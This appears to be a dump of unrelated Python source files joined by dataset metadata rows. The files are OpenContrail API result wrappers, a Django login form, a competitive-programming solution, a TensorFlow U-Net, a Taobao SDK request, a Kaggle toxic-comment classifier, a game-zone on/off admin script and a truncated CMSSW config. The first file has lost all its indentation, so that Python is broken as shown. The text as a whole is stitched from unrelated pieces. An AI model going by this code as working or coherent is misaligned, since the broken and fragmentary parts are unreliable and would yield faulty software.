def is_shared(self):
return self.xpath('virtual-network', 'is_shared')
def global_access(self):
return self.xpath('virtual-network', 'perms2', 'global_access')
@property
def virtual_network_properties(self):
return self.xpath('virtual-network', 'virtual_network_properties')
class CsRtResult (Result):
'''
CsRtResult to provide access to vnc_introspect_utils.get_cs_route_targets
    dict contains:
'''
def fq_name(self):
return ':'.join(self.xpath('route-table', 'fq_name'))
class CsRiResult (Result):
'''
CsRiResult to provide access to vnc_introspect_utils.get_cs_routing_instances
    dict contains:
'''
def rt_links(self):
if self.xpath('routing-instance').has_key('route_target_refs'):
for rt in self.xpath('routing-instance', 'route_target_refs'):
yield rt['href']
def get_rt(self):
target = list()
if self.xpath('routing-instance').has_key('route_target_refs'):
for rt in self.xpath('routing-instance', 'route_target_refs'):
target.append(rt['to'][0])
return target
class CsAllocFipPoolResult (Result):
'''
    CsAllocFipPoolResult to provide access to the allocated floating-ip-pool dict
    dict contains:
'''
pass
class CsVMResult (Result):
'''
CsVMResult to provide access to vnc_introspect_utils.get_cs_vm
    dict contains:
'''
def fq_name(self):
return ':'.join(self.xpath('virtual-machine', 'fq_name'))
def vr_link(self):
return self.xpath('virtual-machine', 'virtual_router_back_refs',
0, 'href')
def vmi_links(self):
vmi_list = (self.xpath('virtual-machine', 'virtual_machine_interfaces') or
self.xpath('virtual-machine', 'virtual_machine_interface_back_refs')) or []
links = []
for vmi in vmi_list or []:
links.append(vmi['href'])
return links
# return self.xpath ('virtual-machine', 'virtual_machine_interfaces',
# 0, 'href')
def service_instance_refs(self):
si_refs = self.xpath('virtual-machine', 'service_instance_refs')
return si_refs
class CsVMIResult (Result):
def get_bindings(self):
bindings = self.xpath('virtual-machine-interface',
'virtual_machine_interface_bindings',
'key_value_pair')
bdict = dict()
for binding in bindings:
bdict[binding['key']] = binding['value']
return bdict
class CsVrOfVmResult (Result):
def name(self):
return self.xpath('name')
class CsVmiOfVmResult (Result):
def ip_link(self):
links = []
instance_ips = self.xpath('virtual-machine-interface',
'instance_ip_back_refs')
for iip in instance_ips or []:
links.append(iip['href'])
return links
def fip_link(self):
if self.xpath('virtual-machine-interface').has_key(
'floating_ip_back_refs'):
return self.xpath('virtual-machine-interface',
'floating_ip_back_refs', 0, 'href')
def properties(self, property=None):
if self.xpath('virtual-machine-interface').has_key(
'virtual_machine_interface_properties'):
if property:
return self.xpath('virtual-machine-interface',
'virtual_machine_interface_properties', property)
else:
return self.xpath('virtual-machine-interface',
'virtual_machine_interface_properties')
@property
def uuid(self):
return self.xpath('virtual-machine-interface', 'uuid')
@property
def vn_fq_name(self):
return ':'.join(self.xpath('virtual-machine-interface',
'virtual_network_refs', 0, 'to'))
@property
def vn_uuid(self):
return self.xpath('virtual-machine-interface',
'virtual_network_refs', 0, 'uuid')
@property
def mac_addr(self):
return self.xpath('virtual-machine-interface',
'virtual_machine_interface_mac_addresses',
'mac_address', 0)
class CsIipOfVmResult (Result):
@property
def ip(self):
return self.xpath('instance-ip', 'instance_ip_address')
@property
def vn_uuid(self):
return self.xpath('instance-ip', 'virtual_network_refs', 0, 'uuid')
@property
def vn_fq_name(self):
return ':'.join(self.xpath('instance-ip',
'virtual_network_refs', 0, 'to'))
class CsFipOfVmResult (Result):
def ip(self):
return self.xpath('floating-ip', 'floating_ip_address')
class CsFipIdResult (Result):
'''
CsFipIdResult to provide access to vnc_introspect_utils.get_cs_fip
    dict contains:
'''
def fip(self):
return self.xpath('floating-ip', 'floating_ip_address')
def vmi(self):
return [vmi['uuid'] for vmi in self.xpath('floating-ip',
'virtual_machine_interface_refs') or []]
class CsSecurityGroupResult (Result):
'''
CsSecurityGroupResult to provide access to vnc_introspect_utils.get_cs_secgrp
'''
def fq_name(self):
return ':'.join(self.xpath('security-group', 'fq_name'))
class CsVirtualMachineInterfaceResult (Result):
'''
CsVirtualMachineInterfaceResult to provide access to vnc_introspect_utils.get_cs_vmi
'''
def uuid(self):
return ':'.join(self.xpath('virtual-machine-interface', 'uuid'))
def fq_name(self):
return ':'.join(self.xpath('virtual-machine-interface', 'fq_name'))
class CsPortTupleResult (Result):
'''
CsPortTupleResult to provide access to vnc_introspect_utils.get_cs_pt
'''
def uuid(self):
return ':'.join(self.xpath('port-tuple', 'uuid'))
def fq_name(self):
return ':'.join(self.xpath('port-tuple', 'fq_name'))
class CsServiceInstanceResult (Result):
'''
CsServiceInstanceResult to provide access to vnc_introspect_utils.get_cs_si
'''
def fq_name(self):
return ':'.join(self.xpath('service-instance', 'fq_name'))
def get_vms(self):
vms = list()
if self.xpath('service-instance').has_key('virtual_machine_back_refs'):
for vm in self.xpath('service-instance', 'virtual_machine_back_refs'):
vms.append(vm['uuid'])
return vms
class CsServiceTemplateResult (Result):
'''
CsServiceTemplateResult to provide access to vnc_introspect_utils.get_cs_st
'''
def fq_name(self):
return ':'.join(self.xpath('service-template', 'fq_name'))
class CsGlobalVrouterConfigResult (Result):
'''
CsGlobalVrouterConfigResult to provide access to vnc_introspect_utils.get_global_vrouter_config
'''
def get_link_local_service(self, name='metadata'):
link_local_service = {}
try:
p = self.xpath('global-vrouter-config', 'linklocal_services')
for elem in p['linklocal_service_entry']:
if (elem['linklocal_service_name'] == name):
link_local_service['name'] = elem['linklocal_service_name']
link_local_service['service_ip'] = elem[
'linklocal_service_ip']
link_local_service['service_port'] = elem[
'linklocal_service_port']
link_local_service['fabric_service_ip'] = elem[
'ip_fabric_service_ip']
link_local_service['fabric_DNS_service_name'] = elem[
'ip_fabric_DNS_service_name']
link_local_service['ip_fabric_service_port'] = elem[
'ip_fabric_service_port']
except Exception as e:
print e
finally:
return link_local_service
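    # Illustrative return value, based on the linklocal_service_entry fields read
    # above (addresses/ports are typical examples, not taken from this repo):
    #   {'name': 'metadata', 'service_ip': '169.254.169.254', 'service_port': 80,
    #    'fabric_service_ip': ..., 'fabric_DNS_service_name': ...,
    #    'ip_fabric_service_port': 8775}
    # An empty dict is returned when the entry is missing or an exception occurs.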
class CsLogicalRouterResult(Result):
'''
CsLogicalRouterResult access logical router dict
'''
def get_rt(self):
target = list()
if self.xpath('logical-router').has_key('route_target_refs'):
for rt in self.xpath('logical-router', 'route_target_refs'):
target.append(rt['to'][0])
return target
def fq_name(self):
return ':'.join(self.xpath('logical-router', 'fq_name'))
def uuid(self):
return self.xpath('logical-router', 'uuid')
class CsTableResult(Result):
'''
CsTableResult access Route table dict
'''
def get_route(self):
if self.xpath('route-table').has_key('routes'):
return self.xpath('route-table', 'routes', 'route')
def fq_name(self):
return ':'.join(self.xpath('route-table', 'fq_name'))
def uuid(self):
return self.xpath('route-table', 'uuid')
class CsLoadbalancer(Result):
'''
CsLoadbalancer access Load Balancer dict
'''
def fq_name(self):
return ':'.join(self.xpath('loadbalancer', 'fq_name'))
def uuid(self):
return self.xpath('loadbalancer', 'uuid')
def name(self):
return self.xpath('loadbalancer', 'name')
def si(self):
return self.xpath('loadbalancer', 'service_instance_refs', 0, 'uuid')
class CsLbPool(Result):
'''
CsLbPool access Load Balancer Pool dict
'''
def fq_name(self):
return ':'.join(self.xpath('loadbalancer-pool', 'fq_name'))
def uuid(self):
return self.xpath('loadbalancer-pool', 'uuid')
def name(self):
return self.xpath('loadbalancer-pool', 'name')
def members(self):
members = list()
for member in self.xpath('loadbalancer-pool', 'loadbalancer_members') or []:
members.append(member['uuid'])
return members
def hmons(self):
hmons = list()
for hmon in self.xpath('loadbalancer-pool',
'loadbalancer_healthmonitor_refs') or []:
hmons.append(hmon['uuid'])
return hmons
def vip(self):
return self.xpath('loadbalancer-pool', 'virtual_ip_back_refs', 0,'uuid')
def si(self):
return self.xpath('loadbalancer-pool', 'service_instance_refs',0,'uuid')
def properties(self):
return self.xpath('loadbalancer-pool', 'loadbalancer_pool_properties')
def custom_attrs(self):
custom_attr = dict()
kvpairs = self.xpath('loadbalancer-pool',
'loadbalancer_pool_custom_attributes',
'key_value_pair') or []
for dct in kvpairs:
custom_attr[dct['key']] = dct['value']
return custom_attr
class CsLbMember(Result):
'''
CsLbMember access Load Balancer Member dict
'''
def fq_name(self):
return ':'.join(self.xpath('loadbalancer-member', 'fq_name'))
def uuid(self):
return self.xpath('loadbalancer-member', 'uuid')
def ip(self):
return self.xpath('loadbalancer-member',
'loadbalancer_member_properties',
'address')
class CsLbVip(Result):
'''
CsLbVip access Load Balancer Vip dict
'''
def fq_name(self):
return ':'.join(self.xpath('virtual-ip', 'fq_name'))
def uuid(self):
return self.xpath('virtual-ip', 'uuid')
def ip(self):
return self.xpath('virtual-ip', 'virtual_ip_properties', 'address')
def vmi(self):
return self.xpath('virtual-ip',
'virtual_machine_interface_refs',
0, 'uuid')
class CsLbHealthMonitor(Result):
'''
CsLbHealthMonitor access Load Balancer Health Monitor dict
'''
def fq_name(self):
return ':'.join(self.xpath('loadbalancer-healthmonitor', 'fq_name'))
def uuid(self):
return self.xpath('loadbalancer-healthmonitor', 'uuid')
def properties(self):
return self.xpath('loadbalancer-healthmonitor', 'loadbalancer_healthmonitor_properties')
class CsVrouters(Result):
def __iter__(self):
for vrouter in self.xpath('virtual-routers'):
yield vrouter
class CsVrouter(Result):
def is_tor_agent(self):
vr_type = self.xpath('virtual-router', 'virtual_router_type')
if vr_type and 'tor-agent' == vr_type.lower():
return True
return False
def is_tsn(self):
vr_type = self.xpath('virtual-router', 'virtual_router_type')
if vr_type and 'tor-service-node' == vr_type.lower():
return True
return False
@property
def ip(self):
return self.xpath('virtual-router', 'virtual_router_ip_address')
class CsBGPaaSResult(Result):
'''
CsBGPaaSResult access bgp_as_a_service dict
'''
def fq_name(self):
return ':'.join(self.xpath('bgp-as-a-service', 'fq_name'))
def uuid(self):
return self.xpath('bgp-as-a-service', 'uuid')
def bgpaas_shared(self):
return self.xpath('bgp-as-a-service', 'bgpaas_shared')
def bgpaas_ip_address(self):
return self.xpath('bgp-as-a-service', 'bgpaas_ip_address')
def autonomous_system(self):
return self.xpath('bgp-as-a-service', 'autonomous_system')
class CsHealthCheckResult(Result):
'''
CsHealthCheckResult access service health check dict
'''
def fq_name(self):
return ':'.join(self.xpath('service-health-check', 'fq_name'))
def uuid(self):
return self.xpath('service-health-check', 'uuid')
def properties(self, attr):
return self.xpath('service-health-check',
'service_health_check_properties',
attr)
@property
def health_check_type(self):
return self.properties('health_check_type')
@property
def status(self):
return self.properties('enabled')
@property
def probe_type(self):
return self.properties('monitor_type')
@property
def delay(self):
return self.properties('delay')
@property
def timeout(self):
return self.properties('timeout')
@property
def max_retries(self):
return self.properties('max_retries')
@property
def http_url(self):
return self.properties('url_path')
@property
def http_method(self):
return self.properties('http_method')
@property
def http_codes(self):
return self.properties('expected_codes')
class CsApiAccessList(Result):
def fq_name(self):
return ':'.join(self.xpath('api-access-list', 'fq_name'))
def uuid(self):
return self.xpath('api-access-list', 'uuid')
def get_rules(self):
return self.xpath('api-access-list', 'api_access_list_entries', 'rbac_rule')
class CsBridgeDomainResult(Result):
def fq_name(self):
return ':'.join(self.xpath('bridge_domain', 'fq_name'))
def name(self):
return self.xpath('bridge_domain', 'name')
| [
"[email protected]"
]
| |
f5aa2f0a35d71460c6b936f9fe19313a0a13913b | 1a3234c1deeb8987fb4c5b424e6485ddd10c8ace | /estagios/core/form.py | 021338a4415b61c90edc91e57e34b3d1b2660f03 | []
| no_license | orlandosaraivajr/estagio | 0c46b16fccf52861f68431a88032ba0fdc46bf66 | 439b797406c82673e9972eee373d60f844679a9c | refs/heads/master | 2022-05-14T14:15:53.109355 | 2020-04-03T05:58:13 | 2020-04-03T05:58:13 | 189,227,824 | 0 | 0 | null | 2022-04-22T21:20:07 | 2019-05-29T13:09:14 | CSS | UTF-8 | Python | false | false | 1,632 | py | from django import forms
from django.forms import ModelForm
from estagios.core.models import User
class LoginForm(ModelForm):
class Meta:
model = User
fields = ['email', 'password']
labels = {
'email': 'E-mail',
'password': 'Senha'
}
widgets = {
'email': forms.EmailInput(attrs={'class': 'form-control'}),
'password': forms.PasswordInput(attrs={'class': 'form-control'})
}
help_texts = {
'email': ('E-mail cadastrado.'),
'password': ('Senha para acesso.'),
}
error_messages = {
'email': {
'required': ("Digite um e-mail válido."),
},
'password': {
'required': ("Senha não pode ser em branco."),
}
}
class NomeCompletoForm(ModelForm):
error_css_class = "error"
class Meta:
model = User
fields = ('first_name',)
labels = {
'first_name': 'Nome Completo',
}
widgets = {
'first_name': forms.TextInput(
attrs={
'class': 'form-control',
'placeholder': 'Preencha seu nome completo.'
}
),
}
error_messages = {
'first_name': {
'required': ("Não deixe este campo em branco. Informe seu nome completo."),
},
}
def clean_first_name(self):
if self.cleaned_data['first_name'] != '':
return self.cleaned_data['first_name']
return 'Nome em Branco'
| [
"[email protected]"
]
| |
2599ba25172f8c4d5bf9dfd7c2d42ef2a622b096 | 48a522b031d45193985ba71e313e8560d9b191f1 | /baekjoon/python/10406.py | 14779fe2b517e02188eedca6e18f8062aa9d26ff | []
| no_license | dydwnsekd/coding_test | beabda0d0aeec3256e513e9e0d23b43debff7fb3 | 4b2b4878408558239bae7146bb4f37888cd5b556 | refs/heads/master | 2023-09-04T12:37:03.540461 | 2023-09-03T15:58:33 | 2023-09-03T15:58:33 | 162,253,096 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 213 | py | import sys
count = 0
w, n, p = map(int, sys.stdin.readline().split())
punch_list = list(map(int, sys.stdin.readline().split()))
for punch in punch_list:
if w <= punch <= n:
count += 1
print(count)
| [
"[email protected]"
]
| |
13ff38fd624a28f8e31a89d15df14a35ccd208fa | 9ecf55bf2601e0d4f74e71f4903d2fd9e0871fd6 | /my_seg_tf/v4_128_128/model/unet.py | ba7e761f74f601823dd64cf81e8c08124d5f3053 | []
| no_license | qq191513/mySeg | 02bc9803cde43907fc5d96dc6a6a6371f2bef6fe | 4337e6a0ca50b8ccbf6ed9b6254f2aec814b24db | refs/heads/master | 2020-04-10T09:57:37.811133 | 2019-06-26T08:21:23 | 2019-06-26T08:21:23 | 160,951,962 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,033 | py | import os
import tensorflow as tf
import sys
sys.path.append('../')
import config as cfg
lr_init = cfg.lr_init
class Unet(object):
def __init__(self, sess, config, is_train):
self.sess = sess
self.name = 'Unet'
self.mask = config.mask
self.ckpt_dir = config.ckpt_dir
self.is_train = is_train
self.images = tf.placeholder(tf.float32, [config.batch_size, config.input_shape[0], config.input_shape[1], config.input_shape[2]]) #initially 512,512,3 for Gray Images
self.labels = tf.placeholder(tf.float32, [config.batch_size, config.labels_shape[0], config.labels_shape[1], config.labels_shape[2]]) #initially 512,512, 256 for Binary Segmentation
self.pred = self.build(self.images)
# self.accuracy = self.compute_acc(self.recons, self.labels)
self.loss = self.compute_loss( self.labels, self.pred)
self.t_vars = tf.get_collection(
tf.GraphKeys.TRAINABLE_VARIABLES, scope=self.name)
self.sess.run(tf.variables_initializer(self.t_vars))
self.saver = tf.train.Saver()
if not tf.gfile.Exists(self.ckpt_dir):
tf.gfile.MakeDirs(self.ckpt_dir)
self.summary_writer = tf.summary.FileWriter(self.ckpt_dir)
self.summary_op = tf.summary.merge(self.loss_summaries)
# self.summary_op = tf.summary.merge(self.acc_summaries)
        self.optim = tf.train.AdamOptimizer(lr_init)  # use NadamOptimizer
        self.train = self.optim.minimize(self.loss)
        # minimize() creates the Adam slot variables after the earlier initializer
        # already ran, so initialize everything again to avoid uninitialized-variable errors.
        self.sess.run(tf.global_variables_initializer())
def fit(self, images, labels, summary_step=-1):
if summary_step >= 0:
# _, loss_val,acc_val, summary_str = self.sess.run(
# [self.train, self.loss, self.acc,self.summary_op],
# {self.images:images, self.labels:labels})
# self.summary_writer.add_summary(summary_str, summary_step)
_,loss_val, summary_str = self.sess.run(
[self.train, self.loss, self.summary_op],
{self.images: images, self.labels: labels})
self.summary_writer.add_summary(summary_str, summary_step)
else :
# _, loss_val,acc_val = self.sess.run(
# [self.train, self.loss,self.acc],
# {self.images:images, self.labels:labels})
_, loss_val = self.sess.run(
[self.train, self.loss],
{self.images: images, self.labels: labels})
return loss_val
def predict(self, images):
result = self.sess.run([self.pred], {self.images:images})
return result
    def compute_loss(self, labels, pred):
        dice_loss = self.dice_coef_loss(labels, pred)
        self.loss_summaries = [
            tf.summary.scalar("dice_loss", dice_loss)]
        total_loss = dice_loss
        return total_loss
    def dice_coef_loss(self, y_true, y_pred, smooth=1.0):
        # dice_coef_loss was referenced above but not defined in the original file;
        # this is a standard soft-Dice loss added so the class is runnable.  It
        # assumes y_true and y_pred hold the same number of elements (e.g. labels
        # of shape [B, H, W, 1] against predictions of shape [B, H, W]).
        y_true_f = tf.reshape(y_true, [-1])
        y_pred_f = tf.reshape(y_pred, [-1])
        intersection = tf.reduce_sum(y_true_f * y_pred_f)
        return 1.0 - (2.0 * intersection + smooth) / (
            tf.reduce_sum(y_true_f) + tf.reduce_sum(y_pred_f) + smooth)
    def build(self, images):
        # The original version skipped the variable scope and concatenated feature
        # maps of mismatched resolution; this fixed version uses stride-2 transposed
        # convolutions and the usual U-Net skip connections so the graph builds.
        with tf.variable_scope(self.name):
            conv1 = self.conv2d(images, 64, 3)
            conv1 = self.conv2d(conv1, 64, 3)
            pool1 = self.maxpooling2d(conv1, [2, 2], [2, 2])
            conv2 = self.conv2d(pool1, 128, 3)
            conv2 = self.conv2d(conv2, 128, 3)
            pool2 = self.maxpooling2d(conv2, [2, 2], [2, 2])
            conv3 = self.conv2d(pool2, 256, 3)
            conv3 = self.conv2d(conv3, 256, 3)
            pool3 = self.maxpooling2d(conv3, [2, 2], [2, 2])
            conv4 = self.conv2d(pool3, 512, 3)
            conv4 = self.conv2d(conv4, 512, 3)
            up5 = tf.concat([self.conv2d_transpose(conv4, 256, 3, stride=2), conv3], axis=3)
            conv5 = self.conv2d(up5, 256, 3)
            conv5 = self.conv2d(conv5, 256, 3)
            up6 = tf.concat([self.conv2d_transpose(conv5, 128, 3, stride=2), conv2], axis=3)
            conv6 = self.conv2d(up6, 128, 3)
            conv6 = self.conv2d(conv6, 128, 3)
            up7 = tf.concat([self.conv2d_transpose(conv6, 64, 3, stride=2), conv1], axis=3)
            conv7 = self.conv2d(up7, 64, 3)
            conv7 = self.conv2d(conv7, 64, 3)
            # single-channel mask with sigmoid so the Dice loss sees values in [0, 1]
            conv8 = self.conv2d(conv7, 1, 1, activation=tf.nn.sigmoid)
            out = tf.squeeze(conv8, axis=3)  # tf.squeeze removes the channel dimension of size 1
            print("shape of squeezed vector:", out.get_shape())
            return out
    def conv2d(self, x, channel, kernel, stride=1, padding="SAME", activation=tf.nn.relu):
        # activation must be passed as a keyword: the sixth positional argument of
        # tf.layers.conv2d is data_format, not activation.
        return tf.layers.conv2d(x, channel, kernel, stride, padding, activation=activation,
                                kernel_initializer=tf.truncated_normal_initializer(stddev=0.01))
def maxpooling2d(self,inputs,pool_size, strides,padding='valid', data_format='channels_last',name=None):
return tf.layers.max_pooling2d(inputs,pool_size, strides,padding=padding, data_format=data_format,name=name)
def conv2d_transpose(self, x, channel, kernel, stride=1, padding="SAME"):
return tf.layers.conv2d_transpose(x, channel, kernel, stride, padding,
kernel_initializer=tf.truncated_normal_initializer(stddev=0.01))
def save(self,epoch):
print('saving model.......')
self.saver.save(self.sess, os.path.join(self.ckpt_dir, "model_{}.ckpt".format(epoch)))
def restore(self,name):
print('restoring model: {}.......'.format(name))
self.saver.restore(self.sess, os.path.join(self.ckpt_dir, name))
| [
"[email protected]"
]
| |
d369fd4de101726338d35665b676a132ab6c4567 | 32cb0be487895629ad1184ea25e0076a43abba0a | /LifePictorial/top/api/rest/CrmShopvipCancelRequest.py | c82fb8fafe43c8edd71af72a729843b38b0af2af | []
| no_license | poorevil/LifePictorial | 6814e447ec93ee6c4d5b0f1737335601899a6a56 | b3cac4aa7bb5166608f4c56e5564b33249f5abef | refs/heads/master | 2021-01-25T08:48:21.918663 | 2014-03-19T08:55:47 | 2014-03-19T08:55:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 289 | py | '''
Created by auto_sdk on 2014-02-10 16:59:30
'''
from top.api.base import RestApi
class CrmShopvipCancelRequest(RestApi):
def __init__(self,domain='gw.api.taobao.com',port=80):
RestApi.__init__(self,domain, port)
def getapiname(self):
return 'taobao.crm.shopvip.cancel'
| [
"[email protected]"
]
| |
f4139ba7b59e752ce0180da1c48a07365de98486 | c839961aeab22795200d9edef9ba043fe42eeb9c | /data/script1014.py | dabede7bc768ce46066e92849eee030bf819e85c | []
| no_license | StevenLOL/kaggleScape | ad2bb1e2ed31794f1ae3c4310713ead1482ffd52 | 18bede8420ab8d2e4e7c1eaf6f63280e20cccb97 | refs/heads/master | 2020-03-17T05:12:13.459603 | 2018-05-02T19:35:55 | 2018-05-02T19:35:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,147 | py |
# coding: utf-8
# In[ ]:
# Inspiration 1: https://www.kaggle.com/tunguz/logistic-regression-with-words-and-char-n-grams/code
# Inspiration 2: https://www.kaggle.com/jhoward/nb-svm-strong-linear-baseline
import pandas as pd
import numpy as np
from sklearn.linear_model import LogisticRegression
from sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer
import re, string
import time
from scipy.sparse import hstack
from scipy.special import logit, expit
from sklearn.model_selection import StratifiedKFold
from sklearn.metrics import roc_auc_score
# In[ ]:
# Functions
def tokenize(s): return re_tok.sub(r' \1 ', s).split()
def pr(y_i, y, x):
p = x[y==y_i].sum(0)
return (p+1) / ((y==y_i).sum()+1)
def get_mdl(y,x, c0 = 4):
y = y.values
r = np.log(pr(1,y,x) / pr(0,y,x))
m = LogisticRegression(C= c0, dual=True)
x_nb = x.multiply(r)
return m.fit(x_nb, y), r
def multi_roc_auc_score(y_true, y_pred):
assert y_true.shape == y_pred.shape
columns = y_true.shape[1]
column_losses = []
for i in range(0, columns):
column_losses.append(roc_auc_score(y_true[:, i], y_pred[:, i]))
return np.array(column_losses).mean()
# In[ ]:
model_type = 'lrchar'
todate = time.strftime("%d%m")
# # Data
# In[ ]:
# read data
train = pd.read_csv('../input/train.csv')
test = pd.read_csv('../input/test.csv')
subm = pd.read_csv('../input/sample_submission.csv')
id_train = train['id'].copy()
id_test = test['id'].copy()
# add empty label for None
label_cols = ['toxic', 'severe_toxic', 'obscene', 'threat', 'insult', 'identity_hate']
train['none'] = 1-train[label_cols].max(axis=1)
# fill missing values
COMMENT = 'comment_text'
train[COMMENT].fillna("unknown", inplace=True)
test[COMMENT].fillna("unknown", inplace=True)
# In[ ]:
# Tf-idf
# prepare tokenizer
re_tok = re.compile(f'([{string.punctuation}“”¨«»®´·º½¾¿¡§£₤‘’])')
# create sparse matrices
n = train.shape[0]
#vec = TfidfVectorizer(ngram_range=(1,2), tokenizer=tokenize, min_df=3, max_df=0.9, strip_accents='unicode',
# use_idf=1, smooth_idf=1, sublinear_tf=1 )
word_vectorizer = TfidfVectorizer(
tokenizer=tokenize,
sublinear_tf=True,
strip_accents='unicode',
analyzer='word',
min_df = 5,
token_pattern=r'\w{1,}',
ngram_range=(1, 3))
# ,
# max_features=250000)
all1 = pd.concat([train[COMMENT], test[COMMENT]])
word_vectorizer.fit(all1)
xtrain1 = word_vectorizer.transform(train[COMMENT])
xtest1 = word_vectorizer.transform(test[COMMENT])
char_vectorizer = TfidfVectorizer(
sublinear_tf=True,
strip_accents='unicode',
analyzer='char',
min_df = 3,
ngram_range=(1, 6))
# ,
# max_features=250000)
all1 = pd.concat([train[COMMENT], test[COMMENT]])
char_vectorizer.fit(all1)
xtrain2 = char_vectorizer.transform(train[COMMENT])
xtest2 = char_vectorizer.transform(test[COMMENT])
# # Model
# In[ ]:
nfolds = 5
xseed = 29
cval = 4
# data setup
xtrain = hstack([xtrain1, xtrain2], format='csr')
xtest = hstack([xtest1,xtest2], format='csr')
ytrain = np.array(train[label_cols].copy())
# stratified split
skf = StratifiedKFold(n_splits= nfolds, random_state= xseed)
# storage structures for prval / prfull
predval = np.zeros((xtrain.shape[0], len(label_cols)))
predfull = np.zeros((xtest.shape[0], len(label_cols)))
scoremat = np.zeros((nfolds,len(label_cols) ))
score_vec = np.zeros((len(label_cols),1))
# In[ ]:
for (lab_ind,lab) in enumerate(label_cols):
y = train[lab].copy()
print('label:' + str(lab_ind))
for (f, (train_index, test_index)) in enumerate(skf.split(xtrain, y)):
# split
x0, x1 = xtrain[train_index], xtrain[test_index]
y0, y1 = y[train_index], y[test_index]
# fit model for prval
m,r = get_mdl(y0,x0, c0 = cval)
predval[test_index,lab_ind] = m.predict_proba(x1.multiply(r))[:,1]
scoremat[f,lab_ind] = roc_auc_score(y1,predval[test_index,lab_ind])
# fit model full
m,r = get_mdl(y,xtrain, c0 = cval)
predfull[:,lab_ind] += m.predict_proba(xtest.multiply(r))[:,1]
print('fit:'+ str(lab) + ' fold:' + str(f) + ' score:%.6f' %(scoremat[f,lab_ind]))
# break
predfull /= nfolds
# In[ ]:
score_vec = np.zeros((len(label_cols),1))
for ii in range(len(label_cols)):
    score_vec[ii] = roc_auc_score(ytrain[:,ii], predval[:,ii])
print(score_vec.mean())
print(multi_roc_auc_score(ytrain, predval))
# # Store results
# In[ ]:
# store prval
prval = pd.DataFrame(predval)
prval.columns = label_cols
prval['id'] = id_train
prval.to_csv('prval_'+model_type+'x'+str(cval)+'f'+str(nfolds)+'_'+todate+'.csv', index= False)
# store prfull
prfull = pd.DataFrame(predfull)
prfull.columns = label_cols
prfull['id'] = id_test
prfull.to_csv('prfull_'+model_type+'x'+str(cval)+'f'+str(nfolds)+'_'+todate+'.csv', index= False)
# store submission
submid = pd.DataFrame({'id': subm["id"]})
submission = pd.concat([submid, pd.DataFrame(prfull, columns = label_cols)], axis=1)
submission.to_csv('sub_'+model_type+'x'+str(cval)+'f'+str(nfolds)+'_'+todate+'.csv', index= False)
| [
"[email protected]"
]
| |
1aa72e7f053db9d44e6084691888488c1d1da4e8 | b1baabe0f34a5595af3f9587b357155590f76569 | /switcher | 44806892454dc8ccc7239c8c9d4a227f32075524 | []
| no_license | anson-tang/3dkserver | cb41269801ec97d747bb7b853841c7ad4921ad94 | 4fec66a0e1c8454252f53bc9ba41ce220357f7e4 | refs/heads/master | 2021-01-19T05:27:11.555032 | 2016-06-22T01:13:04 | 2016-06-22T01:13:04 | 60,994,700 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 3,350 | #!/usr/bin/env python
#-*-coding: utf-8-*-
import sys, os
from os.path import abspath, dirname, join, normpath
PREFIX = normpath( dirname( abspath( __file__ ) ) )
lib_path = normpath( join( PREFIX, 'lib' ) )
if lib_path not in sys.path: sys.path = [ lib_path ] + sys.path
from twisted.internet import reactor, defer
from rpc import ConnectorCreator
from setting import GATEWAYSERVER
from utils import print_e
cmd = None
seconds = 0
uids_admin_want_add = []
USAGE = '''{0}
[ USAGE ]:
     ./switcher  on          Open the game zone.
     ./switcher  status      Show the current status of the game zone.
     ./switcher  off         Close the game zone without stopping the server.
     ./switcher  off 0       Close the game zone without stopping the server.
     ./switcher  off N       Close the game zone, broadcast to all online clients, and stop all game-zone processes after N + 3 seconds.
     ./switcher  add accountname accountname accountname   Add admin accounts that can still enter the game while the game zone is closed.
'''
def switch( p ):
switch_on = ( cmd == 'on' )
return p.call( 'gm_server_status_switch', ( switch_on, seconds ) )
def add_admin( p ):
return p.call( 'gm_add_admin_user', uids_admin_want_add )
def status( p ):
return p.call( 'gm_server_status', None)
def usage( err ):
print USAGE.format( '[ E ]: ' + str( err ) if err else '' )
return False
def parse_argv():
global cmd, switch_on, seconds, uids_admin_want_add
_argv = sys.argv
_l = len( _argv )
if _l < 2:
        return usage( 'Invalid command.' )
else:
cmd = _argv[1].strip()
if cmd in ( 'on', 'off', 'status' ) and _l == 2:
return True
else:
if cmd == 'off' and _l == 3:
try:
seconds = int( _argv[2] )
except:
                    return usage( 'Invalid countdown value.' )
elif cmd == 'add' and _l >= 3:
try:
uids_admin_want_add = map( lambda s:s.strip(), _argv[2:] )
except:
                    return usage( 'Invalid account name format.' )
else:
                return usage( 'Unknown error.' )
return True
@defer.inlineCallbacks
def connected( p ):
res = None
if parse_argv():
if p:
try:
if cmd == 'add':
res = yield add_admin( p )
elif cmd == 'status':
res = yield status( p )
elif cmd in ( 'on', 'off' ):
res = yield switch( p )
else:
                    usage( '{0}: {1}'.format( 'Unknown command', cmd ) )
except:
print_e()
print '[ connected ]OK. cmd', cmd, 'and res([1, 1] means executed successfully)', res
else:
print '[ failed ]connect to {0} : {1} failed'.format(GATEWAYSERVER['localhost'], GATEWAYSERVER['port'])
reactor.stop()
def failed(error):
print '[ failed ]connect failed. error', error.getErrorMessage()
reactor.stop()
def main():
ConnectorCreator( None ).connect(GATEWAYSERVER['localhost'], GATEWAYSERVER['port'], timeout = 1).addCallbacks( connected, failed )
reactor.run()
if __name__ == '__main__': main()
| [
"[email protected]"
]
| ||
c53a010937b63e46766486a720a1459d0abc48db | f31fda8014ecadf6af7d4e3392fb917c49e0352a | /HeavyIonsAnalysis/JetAnalysis/python/jets/akPuFilter1PFJetSequence_PbPb_jec_cff.py | 9ab5f0e173560a4a0aafa9aeb1a3c4177253b7eb | []
| no_license | jniedzie/lightbylight | acea5051f053c49824a49a0b78bac3a2247ee75f | f5a4661fcf3fd3c0e9ccd8893a46a238e30c2aa8 | refs/heads/master | 2020-03-18T12:24:31.970468 | 2018-02-09T15:50:00 | 2018-02-09T15:50:00 | 134,724,759 | 0 | 1 | null | 2018-05-24T14:11:12 | 2018-05-24T14:11:12 | null | UTF-8 | Python | false | false | 15,089 | py |
import FWCore.ParameterSet.Config as cms
from HeavyIonsAnalysis.JetAnalysis.patHeavyIonSequences_cff import patJetGenJetMatch, patJetPartonMatch, patJetCorrFactors, patJets
